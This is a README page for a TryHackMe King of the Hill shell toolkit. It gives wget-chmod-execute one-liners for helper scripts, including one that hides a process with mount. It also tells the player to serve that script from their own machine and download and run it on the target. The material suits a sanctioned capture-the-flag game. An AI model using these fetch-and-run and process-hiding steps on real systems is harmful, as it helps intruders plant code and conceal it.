AnLoMinus / KoTH

KoTH ~ King of the Hill - [BETA]

Home Page:https://Anlominus.github.io/KoTH

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

בס״ד


📜 KoTH Menu ~ To Do

  • 📜 Menu

1️⃣ ~ KoTH ~> TryHackMe VPN

Simple helper script for VPN, VM's, etc

wget https://raw.githubusercontent.com/Anlominus/KoTH/main/KoTH; chmod +x KoTH; ./KoTH

2️⃣ ~ KoTH-Protection ~> Protecting Rank in King of The Hill

A script to protect your king

wget https://raw.githubusercontent.com/Anlominus/KoTH/main/KoTH-Protection ; chmod +x KoTH-Protection; ./KoTH-Protection

3️⃣ ~ KoTh-Hidding ~> A simple script to hide a process with mount

wget https://raw.githubusercontent.com/Anlominus/KoTH/main/KoTH-Hidding; && chmod +x KoTh-Hidding; ./KoTh-Hidding
  • Start local server
    • python3 -m http.server 80
  • in the Target Machine
    • wget http://yourvpnip/KoTh-Hidding && chmod +x KoTh-Hidding && ./KoTh-Hidding

TryHackMe Menu ToDo


  • Scope
    • 1️⃣ Asking For Your Username:
    • 2️⃣ Asking For TryHackMe User Name:
    • 2️⃣ Asking For TryHackMe VPN File Location:
    • 5️⃣ Asking For IP Target: >>> ${ip_Target}
    • 6️⃣ Asking For Name Target: >>> ${ip_Target_Name}
    • 4️⃣ Asking Location For Reporting: >>> ${export_Log_To}

  • 1️⃣ Adding ${box_ip} ${box_name} ~>> /etc/hosts
    • sudo echo "${box_ip} ${box_name}" >> /etc/hosts
  • 2️⃣ Asking For TryHackMe VPN File Location:
  • 3️⃣ Asking Location for Reporting:

  • Anonymity Surfing
    • anonsurf status
    • anonsurf start
    • anonsurf stop


image

  • Machine: Food First Hacked: Nov 24th at 11:57
  • King Changes: 4
  • Status: Completed

About

KoTH ~ King of the Hill - [BETA]

https://Anlominus.github.io/KoTH


Languages

Language:Shell 100.0%